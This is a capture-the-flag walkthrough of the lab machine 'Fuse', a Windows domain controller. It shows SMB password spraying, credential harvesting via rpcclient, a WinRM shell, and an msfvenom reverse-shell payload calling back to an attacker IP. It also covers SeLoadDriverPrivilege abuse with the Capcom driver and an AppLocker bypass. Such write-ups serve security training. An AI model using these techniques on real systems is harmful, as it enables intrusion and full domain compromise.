# Fuse

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FNRcCRnZkSE2cZFNcfL6I%2Ffuse.png?alt=media\&token=05e7d5c5-0e54-4706-8f3e-7efb47ccede5)

## Enumeration

As usual, we start with an nmap scan to find open ports on the target machine.

The following nmap command quickly scans the target machine for open ports and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.193 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scan the entire port range, **from 1 to 65535**.
* `-T5` the **insane** timing template, the fastest one nmap offers.
* `-Pn` assume the host is **online** (skip host discovery).
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Fri Jan  7 21:16:49 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.193
Warning: 10.10.10.193 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.193
Host is up (0.100s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49678/tcp open  unknown
49700/tcp open  unknown

# Nmap done at Fri Jan  7 21:17:29 2022 -- 1 IP address (1 host up) scanned in 40.16 seconds
```

As we can see, quite a lot of ports are open.

Let's try to obtain the services and versions behind these ports. The following command scans them in more depth and saves the result into a file:

> nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 10.10.10.193 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Fri Jan  7 21:18:38 2022 as: nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 -oN targeted 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.11s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 20:31:48Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h53m00s, deviation: 4h37m10s, median: 12m59s
| smb2-time: 
|   date: 2022-01-07T20:31:53
|_  start_date: 2022-01-07T20:29:22
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2022-01-07T12:31:56-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 21:19:35 2022 -- 1 IP address (1 host up) scanned in 57.23 seconds
```

First things first, let's add the domain names to the `/etc/hosts` file.

> nano /etc/hosts

```
# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa-virtualbox
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.193    fabricorp.local fuse.fabricorp.local
```

If we take a look at the website on `http://10.10.10.193`, we'll see a printer website.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FQRuoFFd9564lEql9EiaG%2FCaptura%20de%20pantalla%202022-02-10%20202645.png?alt=media\&token=0bf325c2-d160-4c24-b0ad-0914241a2715)

In the *Print Logs* section we can see three logs. If we click the *View* button of each log, we'll see some usernames.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FIJbEhHNRVFDymx4843H3%2FCaptura%20de%20pantalla%202022-02-10%20203221.png?alt=media\&token=d793e495-92fc-4533-be54-05f5232301a7)

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FH8Ct5K5sdjQlolwovk8c%2FCaptura%20de%20pantalla%202022-02-10%20204404.png?alt=media\&token=04714027-4125-4075-b650-6990c6a5414a)

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FxIN7fBXw8sjBn8moiZ4T%2FCaptura%20de%20pantalla%202022-02-10%20204420.png?alt=media\&token=4b32c288-0c49-4ec5-aa0a-a01b662e89a9)

## Exploitation

Let's add the users *pmerton*, *tlavel*, *sthompson*, *bhult* and *administrator* to a file. At this point, we can use the *cewl* tool, which builds a wordlist from the contents of a web page.

> cewl -w passwords <http://fuse.fabricorp.local/papercut/logs/html/index.htm> --with-numbers

* `-w` write the output to a **file**.
* `--with-numbers` accept words with **numbers**.

Now that we've got some users and candidate passwords, we can try to brute force the *SMB* service with *crackmapexec*. The following command tries to log in as each user with each password from the wordlist. It keeps going even after finding valid credentials, and the `grep` hides the logon failures.

> crackmapexec smb 10.10.10.193 -u users -p passwords --continue-on-success | grep -v FAILURE

* `-u` **users** file.
* `-p` **passwords** file.
* `--continue-on-success` **continue** authentication attempts even after a success.
* `grep -v` select the lines which **don't match** (here, drop the `FAILURE` lines).

```
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)                                                                             
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE                                                                                                                      
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
```

It found that the `Fabricorp01` password is valid for the users *tlavel* and *bhult*, but must be changed before it can be used.

The idea here is to change the password of the *bhult* user and then log in to the *RPC* server. Once we are logged in, we can enumerate all the domain users, as we have done on other HTB machines. Let's change the *bhult* password remotely with the *smbpasswd* tool.
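
As an added illustration (not part of the original write-up), the following Python parses crackmapexec SMB output of the kind shown above and groups each attempt by what its result actually means; the `STATUS_PASSWORD_MUST_CHANGE` lines are the interesting ones, since they mean the password is correct but expired. The sample output is constructed: the *pmerton* and *example.user* lines are made up to exercise every outcome.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the crackmapexec SMB output shown above; the
# pmerton and example.user lines are made up to exercise every outcome.
CME_OUTPUT = """\
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\pmerton:Fabricorp01 STATUS_LOGON_FAILURE
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.193    445    FUSE             [-] fabricorp.local\\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB         10.10.10.193    445    FUSE             [+] fabricorp.local\\example.user:Example01 (Pwn3d!)
"""

# protocol, host, port, netbios name, result marker ([*] info, [-] failure, [+] success), rest
LINE_RE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+\[(?P<marker>[-+*])\]\s+(?P<rest>.*)$"
)
# DOMAIN\user:password, optionally followed by an NTSTATUS name and/or a "(note)"
CRED_RE = re.compile(
    r"^(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?(?:\s+\((?P<note>[^)]*)\))?\s*$"
)


def classify_spray(output):
    """Group each crackmapexec login attempt by what the result actually means.

    valid         -> '[+]' line: the password works and the account can log on.
    valid_expired -> STATUS_PASSWORD_MUST_CHANGE: the password is correct but the
                     DC demands a change before use (the case exploited above).
    failed        -> any other '[-]' result.
    """
    groups = defaultdict(list)
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("marker") == "*":      # skip banner / info lines
            continue
        c = CRED_RE.match(m.group("rest"))
        if not c:
            continue
        entry = (c.group("user"), c.group("password"))
        if m.group("marker") == "+":
            groups["valid"].append(entry)
        elif c.group("status") == "STATUS_PASSWORD_MUST_CHANGE":
            groups["valid_expired"].append(entry)
        else:
            groups["failed"].append(entry)
    return dict(groups)


if __name__ == "__main__":
    for category, entries in classify_spray(CME_OUTPUT).items():
        print(category, entries)
```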

> smbpasswd -r 10.10.10.193 -U "bhult"

```
Old SMB password: Fabricorp01
New SMB password: alfa8sa!$
Retype new SMB password: alfa8sa!$
Password changed for user bhult on 10.10.10.193.
```

Now let's log in to the *RPC* server with the user `bhult` and the password `alfa8sa!$`.

{% hint style="warning" %}
You will have to log in to the RPC server **quickly**, because a scheduled task resets the password you have just changed.
{% endhint %}

> rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193

```
rpcclient $>
```

From here we can enumerate several things. The first are the domain users.

> rpcclient $> enumdomusers

```
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
```

We can clean up the domain user output and write just the names into a file.

> rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v "0x" | tr -d "[]" > users
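
The same filtering in Python, as an added example rather than the author's own: it parses the `enumdomusers` listing into names and numeric RIDs, which also lets us resolve the SID suffix that appears later in the EoPLoadDriver output (`-1104`) back to *svc-print*, since `0x450` is 1104. The sample listing is a constructed subset of the output above.

```python
import re

# Constructed subset of the enumdomusers listing shown above.
ENUMDOMUSERS_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[bhult] rid:[0x1bbd]
"""

USER_RE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[0x(?P<rid>[0-9a-fA-F]+)\]")

# RIDs that exist in every domain; everything from 1000 upwards was created locally.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt", 503: "DefaultAccount"}


def parse_enumdomusers(output):
    """Return [(name, rid)] with the RID converted from rpcclient's hex to an int."""
    return [(m.group("name"), int(m.group("rid"), 16)) for m in USER_RE.finditer(output)]


def user_names(output):
    """The bare user list the grep/tr pipeline above writes to the 'users' file."""
    return [name for name, _ in parse_enumdomusers(output)]


def builtin_accounts(output):
    """Names whose RID is one of the well-known built-in accounts."""
    return [name for name, rid in parse_enumdomusers(output) if rid in WELL_KNOWN_RIDS]


def account_for_sid(output, sid):
    """Map an account SID (e.g. from a registry path or a log) back to a user name.

    The RID is the last sub-authority of the SID, so 'S-1-5-21-...-1104' resolves to
    whichever user enumdomusers lists with rid 0x450.
    """
    rid = int(sid.rsplit("-", 1)[1])
    return next((name for name, r in parse_enumdomusers(output) if r == rid), None)


if __name__ == "__main__":
    print("\n".join(user_names(ENUMDOMUSERS_OUTPUT)))
    print(account_for_sid(ENUMDOMUSERS_OUTPUT, "S-1-5-21-2633719317-1471316042-3957863514-1104"))
```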

We can also enumerate printers. If we do, we'll see a password in the description of the printer.

> rpcclient $> enumprinters

```
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]
```

Now that we have a list of the domain users and the `$fab@s3Rv1ce$1` password, let's see if we can get a shell via *winrm* as any user with that password.

> crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success

* `-u` **users** file.
* `-p` the **password** to try (a single password here, rather than a file).
* `--continue-on-success` **continue** authentication attempts even after a success.

```
WINRM       10.10.10.193    5985   FUSE             [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)
WINRM       10.10.10.193    5985   FUSE             [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\Guest:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\bhult:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\astein:$fab@s3Rv1ce$1
WINRM       10.10.10.193    5985   FUSE             [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1
```

And we see we can get a shell with the user `svc-print` and the password `$fab@s3Rv1ce$1`. Once we have the shell, we can grab the user flag.

> evil-winrm -i 10.10.10.193 -u 'svc-print' -p '$fab@s3Rv1ce$1'

```

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> type \users\svc-print\desktop\user.txt
504c8acb72ed8276d310291e93713482
```

## Privilege Escalation

Let's see what privileges we have.

> whoami /priv

```
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

The `SeLoadDriverPrivilege` privilege is enabled. If you search for how to escalate privileges with that privilege enabled, you'll find a great [article](https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) from *Tarlogic* which explains how to become the `NT AUTHORITY\SYSTEM` user.

{% hint style="info" %}
A user with the **SeLoadDriverPrivilege** assigned is allowed to dynamically load device drivers.

The activation of this privilege in the context of non-privileged users implies a significant risk due to the possibility of executing code in kernel space.
{% endhint %}
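
An added audit check (not part of the original write-up) that parses `whoami /priv` output like the listing above and reports any privilege from a small, well-known high-risk set, `SeLoadDriverPrivilege` among them. The sample output is copied from the listing above.

```python
# Constructed sample copied from the `whoami /priv` output shown above.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that let their holder reach SYSTEM or the kernel. SeLoadDriverPrivilege
# is the one abused on this page; the rest are the usual suspects in the same class.
HIGH_RISK = {
    "SeLoadDriverPrivilege": "load a driver: arbitrary code in kernel space",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate tokens presented to the process",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeTcbPrivilege": "act as part of the operating system",
}


def parse_whoami_priv(output):
    """Parse the table into {privilege: (description, state)}.

    Rows start after the '====' ruler line. The privilege name and the state are
    single tokens, so everything between them is the (space-containing) description.
    """
    lines = output.splitlines()
    ruler = next((i for i, l in enumerate(lines) if l.startswith("=")), -1)
    privs = {}
    for line in lines[ruler + 1:]:
        parts = line.split()
        if len(parts) < 3:
            continue
        name, state = parts[0], parts[-1]
        privs[name] = (" ".join(parts[1:-1]), state)
    return privs


def risky_privileges(output):
    """Return [(privilege, state, why)] for every high-risk privilege the token holds.

    A Disabled privilege is still reported: it is in the token, and a process can
    enable it for itself (the '[+] Enabling SeLoadDriverPrivilege' line in the
    EoPLoadDriver output on this page is exactly that happening).
    """
    return [(name, state, HIGH_RISK[name])
            for name, (_, state) in parse_whoami_priv(output).items()
            if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in risky_privileges(WHOAMI_PRIV):
        print(f"{name} ({state}): {why}")
```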

The article explains that we have to use the *EoPLoadDriver* tool. But, if we go to its [official github](https://github.com/TarlogicSecurity/EoPLoadDriver/), we can only download a `.cpp` file. This means that we have to compile it on Windows.

First, let's create a folder on the desktop called *FUSE*, and open a command prompt inside it.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F1zdZMduo2jNYSHBlUsvY%2FCaptura%20de%20pantalla%202022-02-10%20224756.png?alt=media\&token=8281d7aa-acf8-4ce8-84ca-ac88451b4e38)

Next, let's download the *EoPLoadDriver* github repository, with the `.cpp` file on it.

> git clone <https://github.com/TarlogicSecurity/EoPLoadDriver/>

```
Cloning into 'EoPLoadDriver'...
remote: Enumerating objects: 10, done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10
Receiving objects: 100% (10/10), 5.16 KiB | 1.72 MiB/s, done.
Resolving deltas: 100% (2/2), done.
```

Then we'll have to open *Visual Studio Code*, and create a new project.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FljfedajZ9WNjHBlJerSn%2FCaptura%20de%20pantalla%202022-02-10%20230744.png?alt=media\&token=d77ceac1-4cde-4b8e-8507-cb441b9995aa)

Select the *Console App*.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fs5oSY3qlota1Jl31hWle%2FCaptura%20de%20pantalla%202022-02-10%20231120.png?alt=media\&token=5cb63c5b-7298-4c0e-9a23-ca499482c22e)

Insert the project name.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fe6akHU1hS7bQhULm0UN3%2FCaptura%20de%20pantalla%202022-02-10%20231319.png?alt=media\&token=3a0f4adb-29e1-43c2-9e3f-94b5b670ad93)

Once the project is open, we'll have to copy the [eoploaddriver.cpp](https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp) code and paste it into the project. Then we'll have to delete the first *include* line, `#include "stdafx.h"`.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Ffd1iqN8mCs5QdQFFb8Jn%2FCaptura%20de%20pantalla%202022-02-10%20232727.png?alt=media\&token=2ca2237a-4a87-4cc2-bf2f-fb70093b6e38)

To compile it, let's select `Release` and `x64`.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FjkhOaU4ixtw6GIaerIES%2FCaptura%20de%20pantalla%202022-02-10%20232844.png?alt=media\&token=c7ccaabd-68ad-4265-94f1-87ef1fa8d2dd)

And finally, press *Build* > *Rebuild Solution*.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FJExk1oDjb9z9N5FmoGiC%2FCaptura%20de%20pantalla%202022-02-10%20233005.png?alt=media\&token=24bb518b-dc15-4d07-a632-d03ff83982a1)

Once it ends, it will store the binary at `C:\Users\alfa8sa\source\repos\EoPLoadDriver\x64\Release\EoPLoadDriver.exe`. Let's move it to the *FUSE* folder.

The `Capcom.sys` driver is also needed. Download it from its [github](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys), and move it to the *FUSE* folder.

Then, we'll have to download the [ExploitCapcom.sln](https://github.com/tandasat/ExploitCapcom/blob/master/ExploitCapcom/ExploitCapcom.sln) file and compile it with *Visual Studio Code* again. Let's clone the [ExploitCapcom](https://github.com/tandasat/ExploitCapcom) github repository.

> git clone <https://github.com/tandasat/ExploitCapcom>

```
Cloning into 'ExploitCapcom'...
remote: Enumerating objects: 58, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 58 (delta 11), reused 11 (delta 4), pack-reused 34
Receiving objects: 100% (58/58), 142.24 KiB | 2.54 MiB/s, done.
Resolving deltas: 100% (19/19), done.
```

Then, in *Visual Studio Code*, click *File* > *Open* > *Project/Solution...* and select the `ExploitCapcom.sln` file. Next, select `ExploitCapcom.cpp` in the *Solution Explorer* section.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fb1UQI4Oa7rWRFzMSSiQq%2FCaptura%20de%20pantalla%202022-02-10%20235400.png?alt=media\&token=b7683c42-fea8-466e-b89f-017d51978019)

At the end of the code, we can see that the binary executes the `cmd.exe` program. But I am going to change that, because I want to execute a malicious file called `reverse.exe`, which will send us back a reverse shell. To avoid *AppLocker*, I will put the malicious file in a directory listed on the [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md).

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FSam3LzzOef1IaKKtywCe%2FCaptura%20de%20pantalla%202022-02-11%20000127.png?alt=media\&token=344634b2-cf4f-437d-8c00-bf7557d24f3d)

Then compile it like before, and move the binary to the FUSE folder.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FJExk1oDjb9z9N5FmoGiC%2FCaptura%20de%20pantalla%202022-02-10%20233005.png?alt=media\&token=24bb518b-dc15-4d07-a632-d03ff83982a1)

Finally, we have the `EopLoadDriver.exe`, `ExploitCapcom.exe` and the `Capcom.sys` binaries on our *FUSE* folder.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fo1CGnu4QCKNVJVa4zW6W%2FCaptura%20de%20pantalla%202022-02-11%20230319.png?alt=media\&token=70e68a7c-5fc6-4a7c-bb6f-a666a38f8307)

Let's transfer those to our *Linux* machine with the `http.server` python module.

> python -m http.server

On our Linux machine:

> wget <http://192.168.1.190:8000/EopLoadDriver.exe>
>
> wget <http://192.168.1.190:8000/ExploitCapcom.exe>
>
> wget <http://192.168.1.190:8000/Capcom.sys>

Now we need to create the malicious file which will send us a reverse shell. It has to be named `reverse.exe`, since that is the name compiled into `ExploitCapcom.exe` above.

> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.22 lport=4444 -f exe -o reverse.exe

Now we have to upload those binaries to the victim machine. We can do it with the `upload` functionality of *evil-winrm*. Let's move to the `C:\Windows\System32\spool\drivers\color` directory on the victim machine, and upload them with evil-winrm.

> upload EopLoadDriver.exe
>
> upload ExploitCapcom.exe
>
> upload Capcom.sys
>
> upload reverse.exe
>
> dir

```
    Directory: C:\windows\system32\spool\drivers\color


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/11/2022   2:37 PM          10576 Capcom.sys
-a----        7/16/2016   6:12 AM           1058 D50.camp
-a----        7/16/2016   6:12 AM           1079 D65.camp
-a----        2/11/2022   2:35 PM          15360 EopLoadDriver.exe
-a----        2/11/2022   2:36 PM        1875968 ExploitCapcom.exe
-a----        7/16/2016   6:12 AM            797 Graphics.gmmp
-a----        7/16/2016   6:12 AM            838 MediaSim.gmmp
-a----        7/16/2016   6:12 AM            786 Photo.gmmp
-a----        7/16/2016   6:12 AM            822 Proofing.gmmp
-a----        2/11/2022   2:37 PM           7168 reverse.exe
-a----        7/16/2016   6:12 AM         218103 RSWOP.icm
-a----        7/16/2016   6:12 AM           3144 sRGB Color Space Profile.icm
-a----        7/16/2016   6:12 AM          17155 wscRGB.cdmp
-a----        7/16/2016   6:12 AM           1578 wsRGB.cdmp
```

Before running the binaries, let's set a netcat listener on port 4444.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now all we have to do is run the following commands on the victim machine. The first one loads the `Capcom.sys` driver through a registry key created under our own user hive, which is what `SeLoadDriverPrivilege` allows.

> C:\windows\system32\spool\drivers\color\EopLoadDriver.exe System\CurrentControlSet\alfa8sa C:\windows\system32\spool\drivers\color\Capcom.sys

```
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\alfa8sa
NTSTATUS: 00000000, WinError: 0
```

> C:\windows\system32\spool\drivers\color\ExploitCapcom.exe

```
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000038
[*] Shellcode was placed at 00000205D3BD0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
```

And we should get the reverse shell as the `NT AUTHORITY\SYSTEM` user. Then all we have to do is reap the harvest and take the root flag.

```
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.193] 49814
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami
whoami
nt authority\system

C:\windows\system32\spool\drivers\color>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
6ad78ce332c9a222c30b6108f4ed148f
```
